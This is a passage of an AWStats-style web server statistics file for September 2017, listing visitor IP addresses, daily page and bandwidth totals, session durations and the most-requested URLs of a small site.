111.125.209.133 1 1 39313 20170928154121
185.52.235.136 1 1 39313 20170908141745
138.197.71.243 1 11 276574 20170909225109
197.218.240.142 1 1 39313 20170911083607
64.233.172.183 1 14 1785418 20170915132622
49.44.51.77 0 1 110793 
209.99.133.51 1 1 39313 20170924182128
96.249.244.8 0 1 76607 
74.208.121.187 4 4 157252 20170928124525
43.225.22.87 1 1 39313 20170911083520
202.9.43.99 1 1 39313 20170925012137
138.197.111.18 1 11 276574 20170909232114
210.195.143.60 1 1 39313 20170929155552
101.199.108.120 1 19 453807 20170904020716
122.172.16.133 1 1 39313 20170917102035
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 30
20170901 32 293 20133924 11
20170902 42 352 25849577 17
20170903 41 385 22329713 17
20170904 54 588 48694568 27
20170905 55 372 23468215 19
20170906 41 453 35722751 20
20170907 30 192 18706927 17
20170908 17 19 1394538 16
20170909 17 37 1142843 15
20170910 13 106 11282665 11
20170911 30 225 23342223 21
20170912 32 201 19220907 20
20170913 34 241 23458496 20
20170914 27 28 1442651 18
20170915 18 63 6007223 15
20170916 18 99 7407918 14
20170917 18 19 1013338 16
20170918 28 198 22567295 19
20170919 14 15 661175 14
20170920 23 45 2006963 21
20170921 26 70 6286554 24
20170922 20 27 2471879 19
20170923 21 104 7105163 16
20170924 19 109 11770902 16
20170925 34 232 20284869 27
20170926 25 201 18243773 18
20170927 26 303 33200580 19
20170928 76 155 13653933 27
20170929 20 88 6737760 18
20170930 9 85 7661152 8
END_DAY

# Session range - Number of visits
BEGIN_SESSION 7
1h+ 2
5mn-15mn 4
0s-30s 475
15mn-30mn 5
30s-2mn 44
2mn-5mn 7
30mn-1h 3
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 10 first Pages must be first (order not required for others)
BEGIN_SIDER 7
/ 682 26457649 523 475
/fonts/fontawesome-webfont.woff 109 4843088 10 49
/fonts/glyphicons-halflings-regular.woff 48 1118016 1 11
/fileman/fileman.cgi 8 152331 1 1
/fonts/fontawesome-webfont.ttf 7 564564 5 4
/fonts/fontawesome-webfont.eot 5 191025 0 0
/sitemap.xml 1 511 0 0
END_SIDER
